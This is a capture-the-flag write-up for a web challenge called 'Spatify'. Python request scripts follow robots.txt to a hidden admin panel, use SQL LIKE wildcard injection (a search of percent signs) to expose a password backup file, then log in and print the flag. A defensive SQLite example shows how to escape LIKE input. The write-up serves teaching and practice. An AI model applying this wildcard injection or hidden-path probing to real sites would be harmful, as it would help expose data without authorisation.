
Spatify


Difficulty

Easy

Points

150

Description

Welcome to spatify, the perfect place to enjoy some royalty-free music with neither ads nor vulnerabilities at all!

Quick Analysis

Spatify robots.txt file discovery

Running the Burp Suite crawler (or any other crawler) against the site discovered a /robots.txt file.

What is a robots.txt file used for? [1]

The robots.txt file tells search engine crawlers which URLs the crawler can access on your site.

Content of robots.txt

from requests import get, post
url = 'https://blackhat4-944f71937411184fb04dddb0c9371eb1-0.chals.bh.ctf.sa'  # challenge instance
file = '/robots.txt'
response = get(url + file)
print(response.text)
# output:
User-agent: *
Disallow: /superhiddenadminpanel/
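As an added example (not part of the original writeup), the following parser pulls the Disallow entries out of a robots.txt body, which is the recon step the crawler did automatically here. The robots.txt text it runs on is constructed for the example: it extends the one found on Spatify with comments and two further user-agent groups, including a group that names two agents at once, to exercise the grouping rule of the format.

```python
# Constructed robots.txt (not the real Spatify file) used as sample input.
SAMPLE_ROBOTS = """\
# robots.txt for a fictional site
User-agent: *
Disallow: /superhiddenadminpanel/
Allow: /static/

User-agent: Googlebot
Disallow: /drafts/
Disallow: /backup/*.bak   # trailing comments are allowed

User-agent: Bingbot
User-agent: DuckDuckBot
Disallow: /private/
"""


def parse_robots(text):
    """Parse robots.txt text into {user_agent: {"disallow": [...], "allow": [...]}}.

    A group is opened by one or more consecutive User-agent lines; the
    Disallow/Allow directives that follow apply to every agent named in that
    group. Comments (#) and blank lines are ignored. An empty Disallow value
    means "nothing is disallowed" and is therefore not recorded as a path.
    """
    groups = {}
    current = []            # agents of the group being filled
    expecting_agent = True  # True while we are still reading User-agent lines
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        field, _, value = line.partition(":")
        field = field.strip().lower()
        value = value.strip()
        if field == "user-agent":
            if not expecting_agent:
                current = []        # directives were seen, so this starts a new group
            expecting_agent = True
            current.append(value)
            groups.setdefault(value, {"disallow": [], "allow": []})
        elif field in ("disallow", "allow"):
            expecting_agent = False
            if value:
                for agent in current:
                    groups[agent][field].append(value)
    return groups


def hidden_paths(text):
    """Recon helper: every Disallow path across all groups, deduplicated, in file order."""
    seen = []
    for rules in parse_robots(text).values():
        for path in rules["disallow"]:
            if path not in seen:
                seen.append(path)
    return seen


if __name__ == "__main__":
    for path in hidden_paths(SAMPLE_ROBOTS):
        print(path)
```

The paths this returns are exactly the ones worth requesting next; a Disallow entry is a hint to crawlers, not an access control, which is why /superhiddenadminpanel/ was reachable.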

Spatify's admin panel

The Spatify admin panel at /superhiddenadminpanel/ can only be accessed with a password.

Spatify search engine

The Spatify home page (/) offers a search for music by name. The music listed by default:

<div class="mb-2"><b>[FEATURED] Goldn - Praz Khanal</b></div>
<div class="player mx-auto w-100 mb-4">
    <audio>
        <source src="/static/audio/goldn.mp3" type="audio/mpeg">
    </audio>
</div>

<div class="mb-2"><b>[FEATURED] Guitar Electro Sport Trailer - Gvidon</b></div>
<div class="player mx-auto w-100 mb-4">
    <audio>
        <source src="/static/audio/guitar.mp3" type="audio/mpeg">
    </audio>
</div>

<div class="mb-2"><b>[FEATURED] Learn SQL in 3 minutes</b></div>
<div class="player mx-auto w-100 mb-4">
    <audio>
        <source src="/static/audio/learn_sql.mp3" type="audio/mpeg">
    </audio>
</div>

Analyze the search SQL query

The search requires an input of at least five characters. The one word shared by all three default music names is FEATURED, and searching for FEATURED returns exactly the home page's default list. That suggests the search runs a SQL query that matches the music name with the LIKE operator.

The SQL LIKE Operator [2]

The LIKE operator is used in a WHERE clause to search for a specified pattern in a column.

There are two wildcards often used in conjunction with the LIKE operator:

  • The percent sign (%) represents zero, one, or multiple characters

  • The underscore sign (_) represents one, single character

LIKE syntax

SELECT column1, column2, ...
FROM table_name
WHERE columnN LIKE pattern; 

Spatify search with SQL wildcards

Searching for FEATURE% (FEATURED with its last letter replaced by a wildcard) returns the same three records as the home page. The user input therefore reaches the LIKE pattern unescaped, and % and _ are interpreted as wildcards rather than as literal characters. Note that this is independent of whether the query is parameterised: binding the input as a parameter protects the SQL syntax, but % and _ keep their meaning inside a bound LIKE pattern.
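To make that failure mode concrete, here is an added example (not code from the challenge or from this page) that reproduces the behaviour against an in-memory SQLite table seeded with constructed rows mirroring the listing above. The query shape, the column names and the five-character minimum are assumptions about the challenge's backend. It shows that a parameterised query is still open to wildcard injection, and that the fix is to escape % and _ (and the escape character itself) before building the pattern and to declare the escape character with an ESCAPE clause.

```python
import sqlite3

# Constructed sample data mirroring the page's listing: three featured tracks
# plus the hidden "password backup" row that the wildcard search exposed.
TRACKS = [
    ("[FEATURED] Goldn - Praz Khanal", "/static/audio/goldn.mp3"),
    ("[FEATURED] Guitar Electro Sport Trailer - Gvidon", "/static/audio/guitar.mp3"),
    ("[FEATURED] Learn SQL in 3 minutes", "/static/audio/learn_sql.mp3"),
    ("😋 🅟🅐🅢🅢🅦🅞🅡🅓 🅑🅐🅒🅚🅤🅟 😋", "/static/audio/secret_password_backup.txt.bak"),
]
MIN_QUERY_LEN = 5  # assumed: the only input check the search applies


def make_db():
    """Build the in-memory table the two search functions run against."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE music (name TEXT, src TEXT)")
    conn.executemany("INSERT INTO music VALUES (?, ?)", TRACKS)
    return conn


def search_vulnerable(conn, q):
    """Assumed shape of Spatify's search: the input is bound as a parameter,
    which stops classic SQL injection, but it is dropped straight into the
    LIKE pattern, so % and _ supplied by the user act as wildcards."""
    if len(q) < MIN_QUERY_LEN:
        return []
    cur = conn.execute("SELECT name, src FROM music WHERE name LIKE ?", ("%" + q + "%",))
    return cur.fetchall()


def escape_like(q, esc="\\"):
    """Make user input match literally inside a LIKE pattern: escape the escape
    character first, then the two metacharacters."""
    return q.replace(esc, esc + esc).replace("%", esc + "%").replace("_", esc + "_")


def search_hardened(conn, q):
    """Same search, but the user text is escaped and the ESCAPE clause tells
    SQLite which character introduces a literal % or _."""
    if len(q) < MIN_QUERY_LEN:
        return []
    pattern = "%" + escape_like(q) + "%"
    cur = conn.execute(
        "SELECT name, src FROM music WHERE name LIKE ? ESCAPE '\\'", (pattern,)
    )
    return cur.fetchall()


if __name__ == "__main__":
    db = make_db()
    for q in ("FEATURED", "FEATURE%", "%%%%%", "G_ldn"):
        print(f"{q!r:12} vulnerable={len(search_vulnerable(db, q))} "
              f"hardened={len(search_hardened(db, q))}")
```

The string of five percent signs satisfies the length check yet matches every row, including the password backup, in the vulnerable version; the hardened version returns nothing for it because no name contains a literal %. Note that the escape-first order in escape_like matters: escaping % before the backslash would turn a user-supplied backslash into an escape for the inserted one.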

Exploitation

SQL wildcard injection

To list every music record, search for a string of at least five percent signs (the minimum input length), for example q=%%%%%%. Every row matches, including one that is not featured at all: a password backup file served from the static audio directory.

<div class="mb-2"><b>😋 🅟🅐🅢🅢🅦🅞🅡🅓 🅑🅐🅒🅚🅤🅟 😋</b></div>
<div class="player mx-auto w-100 mb-4">
    <audio>
        <source src="/static/audio/secret_password_backup.txt.bak" type="audio/mpeg">
    </audio>
</div>

<div class="mb-2"><b>[FEATURED] Goldn - Praz Khanal</b></div>
<div class="player mx-auto w-100 mb-4">
    <audio>
        <source src="/static/audio/goldn.mp3" type="audio/mpeg">
    </audio>
</div>

<div class="mb-2"><b>[FEATURED] Guitar Electro Sport Trailer - Gvidon</b></div>
<div class="player mx-auto w-100 mb-4">
    <audio>
        <source src="/static/audio/guitar.mp3" type="audio/mpeg">
    </audio>
</div>

<div class="mb-2"><b>[FEATURED] Learn SQL in 3 minutes</b></div>
<div class="player mx-auto w-100 mb-4">
    <audio>
        <source src="/static/audio/learn_sql.mp3" type="audio/mpeg">
    </audio>
</div>

Content of secret_password_backup.txt.bak

from requests import get
url = 'https://blackhat4-944f71937411184fb04dddb0c9371eb1-0.chals.bh.ctf.sa'
file = '/static/audio/secret_password_backup.txt.bak'
response = get(url + file)
print(response.text)
# output:
THISISTHEPASSWORDTOTHEADMINPANEL123321123321

The flag

import re
from requests import post
url = 'https://blackhat4-944f71937411184fb04dddb0c9371eb1-0.chals.bh.ctf.sa'
endpoint = '/superhiddenadminpanel/'
data = { 'password': 'THISISTHEPASSWORDTOTHEADMINPANEL123321123321' }
response = post(url + endpoint, data = data)
html = response.text
flag = re.search('BlackHatMEA{(.*)}', html)  # group(0) is the whole match, wrapper included
print(flag.group(0))
# output:
BlackHatMEA{551:14:dc339129777027c07c8c63bd0310f7da6d9074a6}

References

  • https://developers.google.com/search/docs/crawling-indexing/robots/intro

  • https://www.w3schools.com/sql/sql_like.asp
